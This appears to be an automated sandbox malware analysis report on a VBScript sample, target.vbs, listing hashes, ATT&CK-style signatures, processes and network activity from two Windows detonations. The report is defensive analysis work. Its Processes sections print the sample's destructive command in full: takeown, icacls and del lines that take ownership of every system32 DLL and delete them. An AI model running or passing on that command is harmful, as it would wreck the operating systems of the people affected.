Malware Analysis Report

2024-11-16 12:54

Sample ID 240809-zqj7vssfkb
Target target.vbs
SHA256 2c1ee1493637138bb1ed42609424e199b357a4602e286ac769d61a877b53b5fc
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

2c1ee1493637138bb1ed42609424e199b357a4602e286ac769d61a877b53b5fc

Threat Level: Likely malicious

The file target.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 20:55

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-09 20:55

Reported

2024-08-09 20:56

Platform

win10v2004-20240802-en

Max time kernel

30s

Max time network

5s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\System32\WScript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 880 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 880 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 4460 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2020 wrote to memory of 4460 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4460 wrote to memory of 4564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4460 wrote to memory of 4564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4460 wrote to memory of 348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4460 wrote to memory of 348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16target.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\*.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\*.dll /grant Everyone:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16target.vbs

MD5 e1927179ed9426b0d7e8ea05f274e1aa
SHA1 52d760ce1cbc5999639667700deaa1dd855f6ee2
SHA256 23e6a8a3566e9abf76e82b16256943c780091688dbd7df5bcf6870af9f960e6b
SHA512 86a7f8d6f2d687530e1d1b9e88923839e52dc422aaca6a43db95b9c1046ce19a3f2bb139b12d689edfdd0f134e6fd1be62c00ebf8dbd8bb69505ede0a9987b9e

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 20:55

Reported

2024-08-09 20:57

Platform

win7-20240704-en

Max time kernel

13s

Max time network

19s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16target.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\*.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\*.dll /grant Everyone:(F)

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16target.vbs

MD5 e1927179ed9426b0d7e8ea05f274e1aa
SHA1 52d760ce1cbc5999639667700deaa1dd855f6ee2
SHA256 23e6a8a3566e9abf76e82b16256943c780091688dbd7df5bcf6870af9f960e6b
SHA512 86a7f8d6f2d687530e1d1b9e88923839e52dc422aaca6a43db95b9c1046ce19a3f2bb139b12d689edfdd0f134e6fd1be62c00ebf8dbd8bb69505ede0a9987b9e